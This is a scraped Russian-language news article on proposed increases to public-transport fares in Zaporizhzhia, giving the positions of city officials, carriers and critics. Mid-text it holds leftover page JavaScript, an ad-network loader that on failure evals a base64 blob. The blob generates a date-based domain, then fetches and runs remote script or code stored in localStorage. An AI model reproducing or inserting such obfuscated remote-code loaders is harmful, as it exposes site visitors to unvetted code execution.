В Запорожье назвали новые «компромиссные» тарифы на проезд в общественном транспорте

В запорожской мэрии считают, что нашли компромисс в вопросе повышения стоимости проезда в городском общественном транспорте. Новые тарифы будут несколько ниже ранее объявленных в 12-14 грн за одну поездку.

По итогам обсуждения с перевозчиками и жителями города, в запорожской мэрии пришли к решению о необходимости повышения стоимости проезда в общественном транспорте Запорожья до 10-12 грн на большинстве маршрутов. Об этом стало известно по результатам заседания рабочей группы при мэрии, сообщает Акцент со ссылкой на 061.

По словам представителей управления транспорта, перевозчики предоставили расчеты с обоснованием новых тарифов в размере 16-17 грн, а на некоторых маршрутах и больше. КП «Запорожэлектротранс» также вышел с предложением тарифа в 17 грн. В тоже время как ранее сообщал Акцент в мэрии готовили документ с новыми тарифами по каждому маршруту, где они в среднем колебались от 12 до 14 грн за поездку. В результате самый дорогой тариф будет с Хортицкого района в центр Запорожья — 13 грн, на большинстве других маршрутов стоимость проезда будет чуть ниже.

«Мы вышли по итогам на изменения в тарифах в 12 гривен по городу и в 13 гривен с Хортицкого района. Это экономически обоснованная стоимость проезда. В авьтобусах КП «Запорожэлектротранс» стоимость проезда составит 10 гривен», — прокомментировал заместитель начальника управления транспорта и связи Александр Кухарев.

Отметим, сейчас стоимость проезда на большинстве маршруток составляет 8 грн, в муниципальном транспорте — 6 грн в троллейбусах и трамваях, 7 грн — в автобусах. На маршрутах, соединяющих Бабурку и левый берег — стоимость проезда — 9 грн.

Среди аргументов, которые приводят чиновники в пользу повышения стоимости проезда — рост цен на топливо, энергоресурсы, минимальных разаботных плат.

Некоторые участники рабочей группы поддали критике плагируемоме повышение, ведь по ихс словам за последний год произошло не так много изменений,  что цену на проезд решили поднять, едва ли не в два раза. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

«Как людям выживать, если в течение года проезд с 6 гривен поднялся до 12 гривен. Последнее повышение также объясняли, что тариф слишком низкий и вот новый будет надолго. Большая часть маршруток использует дизтопливо, но оно ведь не в два раза увеличилось за год», — отмечали представители общественных организаций.

В свою очередь перевозчики утверждаеют, что карантин очень сильно повлиял на доходы автотранспортных предприятий». Эталоны» стали невостребованными, последний раз транспорт обновляли в 2013 году. Кроме того городские власти не компенсируют проезд льготной категории.  Однако о повышении качества услуг при таком росте тарифов идти речь не может, уверяют предстаивтели транспортных компаний.

«12 гривен — это только, чтобы мы не умерли. Ни о каком развитии не может идти и речи. С 2003 года мы каждый год покупали по 3-4 сретифицированной единицы техники Последний раз технику мы покупали вообще в 2013 году. Если говорить о газе: то согласовали проезд по 8 гривен, когда метан стоил 17 гривен. Сейчас на стеле АЗС метан стоит 49,99 и 60 гривен. Вот теперь давайте посчитаем, как выросло потребление газа и как мы можем выживать» — пояснил свою позицию директор «Феникс Авто» Леонид Фельский.

В результате по итогам обсуждения было принято решение поручить управлению транспорта подготовить проект решения исполкома об увеличении тарифов на проезд в общественном транспорте согласно озвученных компромиссных цифр.

Напомним, ранее запорожцы поддержали петицию против повышения стоимости проезда в общественном транспорте.

Подписывайтесь на Акцент в

(adsbygoogle = window.adsbygoogle || []).push({});

Источник: https://akzent.zp.ua/v-zaporozhe-nazvali-novye-kompromissnye-tarify-na-proezd-v-obshhestvennom-transporte/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

нет
scroll to top